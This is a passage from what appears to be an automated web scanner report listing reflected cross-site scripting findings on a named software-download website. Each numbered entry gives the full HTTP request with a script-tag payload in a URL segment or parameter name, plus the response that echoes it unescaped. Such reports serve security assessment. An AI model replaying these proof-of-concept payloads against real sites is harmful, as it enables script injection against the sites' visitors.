<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloadsc4614"><script>alert(1)</script>35e4d9d2a2a/t-64-bit-pidgin-download-kkwthbed.html" />
...[SNIP]...

4.1757. http://www.x64bitdownload.com/downloads/t-64-bit-pidgin-download-kkwthbed.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-pidgin-download-kkwthbed.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d72b"><script>alert(1)</script>775e881c02c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-pidgin-download-kkwthbed.html3d72b"><script>alert(1)</script>775e881c02c HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:22:37 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57831

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-pidgin-download-kkwthbed.html3d72b"><script>alert(1)</script>775e881c02c"/>
...[SNIP]...

4.1758. http://www.x64bitdownload.com/downloads/t-64-bit-pidgin-download-kkwthbed.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-pidgin-download-kkwthbed.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c708f"><script>alert(1)</script>5f593c9e2bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-pidgin-download-kkwthbed.html?c708f"><script>alert(1)</script>5f593c9e2bd=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:18:30 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57837

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-pidgin-download-kkwthbed.html?c708f"><script>alert(1)</script>5f593c9e2bd=1"/>
...[SNIP]...

4.1759. http://www.x64bitdownload.com/downloads/t-64-bit-rss-reader-download-avwkinlm.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-rss-reader-download-avwkinlm.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3b9e"><script>alert(1)</script>b57549acbe3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloadsb3b9e"><script>alert(1)</script>b57549acbe3/t-64-bit-rss-reader-download-avwkinlm.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:19:08 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21327

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloadsb3b9e"><script>alert(1)</script>b57549acbe3/t-64-bit-rss-reader-download-avwkinlm.html" />
...[SNIP]...

4.1760. http://www.x64bitdownload.com/downloads/t-64-bit-rss-reader-download-avwkinlm.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-rss-reader-download-avwkinlm.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5e04"><script>alert(1)</script>80ff2e869b2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-rss-reader-download-avwkinlm.htmlc5e04"><script>alert(1)</script>80ff2e869b2 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:20:22 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54645

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-rss-reader-download-avwkinlm.htmlc5e04"><script>alert(1)</script>80ff2e869b2"/>
...[SNIP]...

4.1761. http://www.x64bitdownload.com/downloads/t-64-bit-rss-reader-download-avwkinlm.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-rss-reader-download-avwkinlm.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b65e"><script>alert(1)</script>1c166d61bb7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-rss-reader-download-avwkinlm.html?5b65e"><script>alert(1)</script>1c166d61bb7=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:35 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54651

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-rss-reader-download-avwkinlm.html?5b65e"><script>alert(1)</script>1c166d61bb7=1"/>
...[SNIP]...

4.1762. http://www.x64bitdownload.com/downloads/t-64-bit-skype-download-szhzvwoz.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-skype-download-szhzvwoz.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18719"><script>alert(1)</script>ee7861559ed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads18719"><script>alert(1)</script>ee7861559ed/t-64-bit-skype-download-szhzvwoz.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:21:13 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloads18719"><script>alert(1)</script>ee7861559ed/t-64-bit-skype-download-szhzvwoz.html" />
...[SNIP]...

4.1763. http://www.x64bitdownload.com/downloads/t-64-bit-skype-download-szhzvwoz.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-skype-download-szhzvwoz.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75f95"><script>alert(1)</script>c335ecb6c9b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-skype-download-szhzvwoz.html75f95"><script>alert(1)</script>c335ecb6c9b HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:22:30 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57891

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-skype-download-szhzvwoz.html75f95"><script>alert(1)</script>c335ecb6c9b"/>
...[SNIP]...

4.1764. http://www.x64bitdownload.com/downloads/t-64-bit-skype-download-szhzvwoz.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-skype-download-szhzvwoz.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ec64"><script>alert(1)</script>d5da7e23d0e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-skype-download-szhzvwoz.html?1ec64"><script>alert(1)</script>d5da7e23d0e=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:18:17 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57897

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-skype-download-szhzvwoz.html?1ec64"><script>alert(1)</script>d5da7e23d0e=1"/>
...[SNIP]...

4.1765. http://www.x64bitdownload.com/downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39331"><script>alert(1)</script>831ea6de695 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads39331"><script>alert(1)</script>831ea6de695/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:21:38 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21339

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloads39331"><script>alert(1)</script>831ea6de695/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html" />
...[SNIP]...

4.1766. http://www.x64bitdownload.com/downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9b2f"><script>alert(1)</script>30e728f96c4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.htmld9b2f"><script>alert(1)</script>30e728f96c4 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:22:52 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56614

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.htmld9b2f"><script>alert(1)</script>30e728f96c4"/>
...[SNIP]...

4.1767. http://www.x64bitdownload.com/downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65876"><script>alert(1)</script>0527961b680 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html?65876"><script>alert(1)</script>0527961b680=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:18:52 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56620

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html?65876"><script>alert(1)</script>0527961b680=1"/>
...[SNIP]...

4.1768. http://www.x64bitdownload.com/downloads/t-64-bit-teamspeak-download-opmulwsy.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-teamspeak-download-opmulwsy.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85299"><script>alert(1)</script>d551f5477b5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads85299"><script>alert(1)</script>d551f5477b5/t-64-bit-teamspeak-download-opmulwsy.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:22:42 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloads85299"><script>alert(1)</script>d551f5477b5/t-64-bit-teamspeak-download-opmulwsy.html" />
...[SNIP]...

4.1769. http://www.x64bitdownload.com/downloads/t-64-bit-teamspeak-download-opmulwsy.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-teamspeak-download-opmulwsy.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75347"><script>alert(1)</script>3f02c20ef7c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-teamspeak-download-opmulwsy.html75347"><script>alert(1)</script>3f02c20ef7c HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:23:45 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-teamspeak-download-opmulwsy.html75347"><script>alert(1)</script>3f02c20ef7c"/>
...[SNIP]...

4.1770. http://www.x64bitdownload.com/downloads/t-64-bit-teamspeak-download-opmulwsy.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-teamspeak-download-opmulwsy.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ade4"><script>alert(1)</script>9b2e7ce64af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-teamspeak-download-opmulwsy.html?2ade4"><script>alert(1)</script>9b2e7ce64af=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:20:41 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59895

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-teamspeak-download-opmulwsy.html?2ade4"><script>alert(1)</script>9b2e7ce64af=1"/>
...[SNIP]...

4.1771. http://www.x64bitdownload.com/downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15e9e"><script>alert(1)</script>2068dbf1796 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads15e9e"><script>alert(1)</script>2068dbf1796/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:20:35 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21340

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloads15e9e"><script>alert(1)</script>2068dbf1796/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html" />
...[SNIP]...

4.1772. http://www.x64bitdownload.com/downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e2d1"><script>alert(1)</script>b29de778e85 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html2e2d1"><script>alert(1)</script>b29de778e85 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:22:00 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html2e2d1"><script>alert(1)</script>b29de778e85"/>
...[SNIP]...

4.1773. http://www.x64bitdownload.com/downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4317f"><script>alert(1)</script>f5492ba1d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html?4317f"><script>alert(1)</script>f5492ba1d6=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:17:45 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54162

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html?4317f"><script>alert(1)</script>f5492ba1d6=1"/>
...[SNIP]...

4.1774. http://www.x64bitdownload.com/downloads/t-64-bit-usenext-download-rizftkeg.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
